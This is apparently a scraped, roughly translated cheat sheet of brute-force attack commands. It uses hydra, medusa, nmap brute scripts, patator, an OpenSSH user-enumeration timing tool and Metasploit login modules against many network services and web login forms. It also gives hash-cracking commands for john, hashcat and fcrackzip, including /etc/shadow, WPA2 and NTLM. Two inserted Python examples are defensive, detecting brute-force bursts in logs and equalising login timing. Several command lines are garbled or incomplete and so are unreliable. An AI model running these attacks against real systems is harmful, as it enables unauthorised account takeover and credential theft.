Brute Force hack

Source: Internet
Author: User
Tags imap informix snmp rsync

SMB:

enum -D -u administrator -f passwords.txt <server name>

FTP:  

medusa -H ip.txt -U user.txt -P passwd.txt -M ftp

hydra -l <username> -P <password dictionary> -e ns -vV <IP> ftp

Hydra

Crack http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18

Crack imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

Crack cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

Crack https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

Crack teamspeak:
# hydra -l <username> -P <password dictionary> -s <port number> -vV <IP> teamspeak

Web form login cracking

GET submission, crack a web login:
# hydra -l <username> -P <password dictionary> -t <threads> -vV -e ns <IP> http-get /admin/
# hydra -l <username> -P <password dictionary> -t <threads> -vV -e ns -f <IP> http-get /admin/index.php

POST submission, crack a web login (verification codes/CAPTCHAs are not supported):
# hydra -l admin -P pass.lst -o ok.lst -t 1 -f <IP> http-post-form "/index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>"

Description: the username is admin, the password dictionary is pass.lst, cracked results are saved to ok.lst, -t 1 sets the number of simultaneous threads to 1, -f stops as soon as one password is cracked, and IP is the destination IP.
http-post-form means the target is a form login submitted with the HTTP POST method.
The parameters that follow are the name attributes of the corresponding form fields in the web page, and the trailing <title> string is the response text that indicates a failed guess; it can be customized.
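Form guessing of the kind described above shows up in authentication logs as a burst of failures from one source, sometimes ending in a success. The following detection sketch is an added example, not part of the original page; the log format, threshold and window are assumptions, and the sample lines are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not real data): "<ISO time> <source IP> <user> <OK|FAIL>"
SAMPLE_LOG = """\
2024-05-01T10:00:00 203.0.113.7 admin FAIL
2024-05-01T10:00:02 203.0.113.7 admin FAIL
2024-05-01T10:00:04 203.0.113.7 admin FAIL
2024-05-01T10:00:06 203.0.113.7 admin FAIL
2024-05-01T10:00:08 203.0.113.7 admin FAIL
2024-05-01T10:00:10 203.0.113.7 admin OK
2024-05-01T10:01:00 198.51.100.20 alice FAIL
2024-05-01T10:06:00 198.51.100.20 alice FAIL
2024-05-01T10:06:30 198.51.100.20 alice OK
2024-05-01T10:10:00 192.0.2.55 root FAIL
2024-05-01T10:10:05 192.0.2.55 admin FAIL
2024-05-01T10:10:10 192.0.2.55 test FAIL
2024-05-01T10:10:15 192.0.2.55 guest FAIL
2024-05-01T10:10:20 192.0.2.55 oracle FAIL
"""

def detect_bruteforce(log_text, window=timedelta(seconds=60), threshold=5):
    """Return {ip: {"users_tried": set, "success_after_burst": list}} for flagged IPs."""
    failures = defaultdict(deque)   # ip -> (time, user) of failures inside the window
    flagged = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue                # ignore malformed lines
        ts = datetime.fromisoformat(parts[0])
        ip, user, result = parts[1:]
        recent = failures[ip]
        while recent and ts - recent[0][0] > window:
            recent.popleft()        # expire failures older than the window
        if result == "FAIL":
            recent.append((ts, user))
            if len(recent) >= threshold:
                entry = flagged.setdefault(
                    ip, {"users_tried": set(), "success_after_burst": []})
                entry["users_tried"].update(u for _, u in recent)
        elif result == "OK" and ip in flagged and recent:
            # A success right after a burst: treat the account as compromised.
            flagged[ip]["success_after_burst"].append(user)
    return flagged
```

An entry with a non-empty success_after_burst list is the one to act on first: reset that account's password and review its session activity.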

Timing-attack user enumeration against OpenSSH

Note: A user-enumeration timing attack is a side-channel attack. A side-channel attack exploits information outside the main channel, such as encryption/decryption speed, chip pin voltages, or ciphertext traffic and transmission paths; in a phrase, "beating around the bush."
Osueta is a Python 2 script for timing attacks against OpenSSH. It can enumerate OpenSSH user names using a timing attack and, under certain conditions, carry out a DoS attack on the OpenSSH server.
# https://github.com/c0r3dump3d/osueta
$ ./osueta.py -H 192.168.1.6 -p 22 -U root -d -v yes
$ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes --dos no -L userfile.txt
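Why response time can reveal valid user names, and how a login service removes the difference, shown on a generic password check. This is an added example, not OpenSSH or osueta code; the user store, account name and PBKDF2 work factor are assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumption: PBKDF2 work factor chosen for this example
kdf_calls = 0         # instrumentation: counts expensive hash computations

def _kdf(password, salt):
    global kdf_calls
    kdf_calls += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

def make_record(password):
    salt = os.urandom(16)
    return salt, _kdf(password, salt)

# Constructed user store (hypothetical account and password)
USERS = {"alice": make_record("correct horse")}
# Dummy record checked for unknown users so they cost the same as real ones
DUMMY = make_record(os.urandom(16).hex())

def login_leaky(user, password):
    """'Before' version: returns early for unknown users, so they answer faster."""
    rec = USERS.get(user)
    if rec is None:
        return False            # no KDF run: measurably quicker than a real user
    salt, stored = rec
    return hmac.compare_digest(_kdf(password, salt), stored)

def login_uniform(user, password):
    """Hardened: always runs one KDF and one constant-time compare."""
    salt, stored = USERS.get(user, DUMMY)
    ok = hmac.compare_digest(_kdf(password, salt), stored)
    return ok and user in USERS

def kdf_cost(fn, user, password):
    """Number of KDF runs one login attempt triggers (a proxy for its latency)."""
    before = kdf_calls
    fn(user, password)
    return kdf_calls - before
```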

Crack

nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.1.4    # crack rsync
nmap --script informix-brute -p 9088 192.168.1.4    # crack an informix database
nmap -p 5432 --script pgsql-brute 192.168.1.4    # crack pgsql
nmap -sU --script snmp-brute 192.168.1.4    # crack SNMP
nmap -sV --script=telnet-brute 192.168.1.4    # crack telnet

Enumerating Samba
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

Enumerate SNMP
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP

# SMTP brute force (patator)

$ patator smtp_login host=192.168.1.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.1.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.1.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.1.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'

MD5 hack (example: md5.txt file, MD5 hashes without salt)

john --format=raw-md5 --pot=./wordlist.pot md5.txt

john --format=raw-md5-opencl --wordlist=wordlist.lst --rules:Single md5.txt    (uses the GPU to speed up cracking)

Hash hack

hashcat -m 400 -a 0 hash /root/rockyou.txt    # crack the hash

Hack linux passwords

"/etc/shadow"  "/etc/shadow" -i:digits -user:test1 user1    # incremental (traversal) mode: tries all possible password combinations
Parameters:
All (0 to 8 characters long)
Alpha (all combinations of letters 1 to 8 characters long)
Digits (all combinations of numbers 1 to 8 characters long)
Alnum (1 to 8 characters long all letters /
-show hashes
--restore hashes: continue cracking from where the previous run stopped (cracked results appear as a question mark)

ZIP password hack:

(1) fcrackzip brute force: 4-41 (where -b is brute force, -l describes the password length, -u is a file, -v is verbose output, -c is the password dictionary type)

oclHashcat

Whether the hash is MD5, MSSQL, SHA1 or another type, the cracking command is the same; -m sets the hash type.

Crack a WPAv2 hash: cudahashcat 2500 out.hccap
Crack an NTLM hash: cudahashcat +

Some brute-force modules in Metasploit

auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login
